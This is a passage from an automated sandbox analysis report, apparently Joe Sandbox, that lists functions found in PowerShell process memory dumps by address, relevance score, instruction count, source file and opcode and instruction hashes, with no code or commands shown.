                                                                                          • Instruction ID: e5723e9ffc0d185f3c60db483d948bebe619131bc6d5e7c76c7e396eb31a77d5
                                                                                          • Opcode Fuzzy Hash: 2c91f3193baf763e4d9627c7f3c606d3df8d22d6a27bd99b9abfa61393d57ea1
                                                                                          • Instruction Fuzzy Hash: 2A41DD22A0E7C51FE35AA76848B56A57FE1AF57220B4901EFD589CF1E7C91C6808D322
                                                                                          Function 00007FFD349621EA Relevance: .1, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2427179770.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f03dcd2e80020b29335500f275842f63633832b3c28105e9966b74191070eeba
                                                                                          • Instruction ID: e098fd278bed468dfc133e9c33d1ed2914ab4f3fe33e2c3213ef35a48731d0ea
                                                                                          • Opcode Fuzzy Hash: f03dcd2e80020b29335500f275842f63633832b3c28105e9966b74191070eeba
                                                                                          • Instruction Fuzzy Hash: 3D21D722F0DA4A0FE7A9B76C54A527466C2EF9633075904BED50CC71DBDD2DFC05A211
                                                                                          Function 00007FFD34893BB5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2426211070.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction ID: a327de475649e39b91b7046df0871a33edb4dc98645e85fd541f828c31e0d722
                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction Fuzzy Hash: D901A73020CB0C4FD754EF0CE451AA5B7E0FB99320F10052DE58AC3651D736E882CB41

                                                                                          Non-executed Functions

                                                                                          Function 00007FFD34893EFA Relevance: .4, Instructions: 402COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2426211070.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eea3becd49d50170f960e8bdada4e7b76597003d37f61f987637c4c8904f15b1
                                                                                          • Instruction ID: 225df9539c9cadc4c9b83b5b09bd42fa3a9a8b0fa9994ed0b60f8bd123b81b1e
                                                                                          • Opcode Fuzzy Hash: eea3becd49d50170f960e8bdada4e7b76597003d37f61f987637c4c8904f15b1
                                                                                          • Instruction Fuzzy Hash: 0ED16D56A0EBD25FE753973858B60E57FA0EF53625B0D10F7C6D4CE093DA0C680AA322
                                                                                          Function 00007FFD34893CFA Relevance: .3, Instructions: 264COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2426211070.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 959e365d3c6d7f4b30f0669da7ee0d0592ec94a3db6731baec5b766e83d4a19f
                                                                                          • Instruction ID: b2e46fbcb19c9cbc2995bc0735ba78ad57ef9f373424c69a1489c0e03e209908
                                                                                          • Opcode Fuzzy Hash: 959e365d3c6d7f4b30f0669da7ee0d0592ec94a3db6731baec5b766e83d4a19f
                                                                                          • Instruction Fuzzy Hash: E1816157B0DAC35FE353972D98B60D57FA0EE5722570D04F7C6C4CA493DA0C680AA762
                                                                                          Function 00007FFD34896151 Relevance: .2, Instructions: 239COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2426211070.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3d58195b63b41a645f88be4cba6f2213caa971167a1794a70db5bf8f585bd9e5
                                                                                          • Instruction ID: 8b4a583b50262c97a80caa0d5c0e63052be1a1e74ec45dc99504c1b7dd1effd4
                                                                                          • Opcode Fuzzy Hash: 3d58195b63b41a645f88be4cba6f2213caa971167a1794a70db5bf8f585bd9e5
                                                                                          • Instruction Fuzzy Hash: 72714386B4EBD21FE7574B6858B64DA7FA4DF5326570900F7C2D4DA0A3D90C280AE352
                                                                                          Function 00007FFD348962FB Relevance: .2, Instructions: 223COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2426211070.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 049578f39d7e60da01f8c8b3692913881e6bd5bbacba686a2a9b42ed6afebd09
                                                                                          • Instruction ID: 4ed866ee37d77bbe4adb6ba78edd5bea48fde6ff8ee8f15edb70c379dad27efd
                                                                                          • Opcode Fuzzy Hash: 049578f39d7e60da01f8c8b3692913881e6bd5bbacba686a2a9b42ed6afebd09
                                                                                          • Instruction Fuzzy Hash: E661DA47B0D6D21BE26267BC68F61EA3FE0DF5337571C00B7C688DA0A3AC1C644B6291
                                                                                          Function 00007FFD348957FA Relevance: .2, Instructions: 169COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2426211070.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aa22e22c523332dde7553c94c07ed593359e2b7ec3d39b7d0e28bae592b46b43
                                                                                          • Instruction ID: 3a3a5e0bcc829e8517a0d8988f98fd1c164dc1bcdc315d41f7207189860b8a75
                                                                                          • Opcode Fuzzy Hash: aa22e22c523332dde7553c94c07ed593359e2b7ec3d39b7d0e28bae592b46b43
                                                                                          • Instruction Fuzzy Hash: F9417847B0EAA25BF1A263AC6CF61EA2F94DF533B571C0477C388D5093AC1C684762D2

                                                                                          Executed Functions

                                                                                          Function 00007FFD34993324 Relevance: .1, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2206991618.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ffd34990000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e83681c5ec8e24c2ad72077cb93e7a45267c8f2a893957dd0c85bd588d69a443
                                                                                          • Instruction ID: 0925aeea8157aec94843c31e961f6d1e6b9dc26675f22817895b1289c582c7e6
                                                                                          • Opcode Fuzzy Hash: e83681c5ec8e24c2ad72077cb93e7a45267c8f2a893957dd0c85bd588d69a443
                                                                                          • Instruction Fuzzy Hash: 14313532B4DA494FEBA4EA5C94A26B8B7D2EF5D210B5801BFC14DC7193DE2DE801C350
                                                                                          Function 00007FFD3499334A Relevance: .1, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2206991618.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ffd34990000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5c64e6302e3024669062928b62700701b19b47e0a7f374da2468c46633b1d4b8
                                                                                          • Instruction ID: 98fa97f15a25a323262f167b66476ca4b7ab7f55ae2b7e2ceb7334acd957a063
                                                                                          • Opcode Fuzzy Hash: 5c64e6302e3024669062928b62700701b19b47e0a7f374da2468c46633b1d4b8
                                                                                          • Instruction Fuzzy Hash: 4A11C632B0DA458FEB65DF5880E617877D2EF5D311B5400BEC14DC7197DE29A805C311
                                                                                          Function 00007FFD348C33B5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2206631302.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ffd348c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                          • Instruction ID: bd047773c0eba2039cb01fe63577d77a598f3d7d22b04674929b2521223c22b2
                                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                          • Instruction Fuzzy Hash: 8401677121CB0D4FD744EF4CE491AA6B7E0FB99364F10056EE58AC3651DA36E882CB45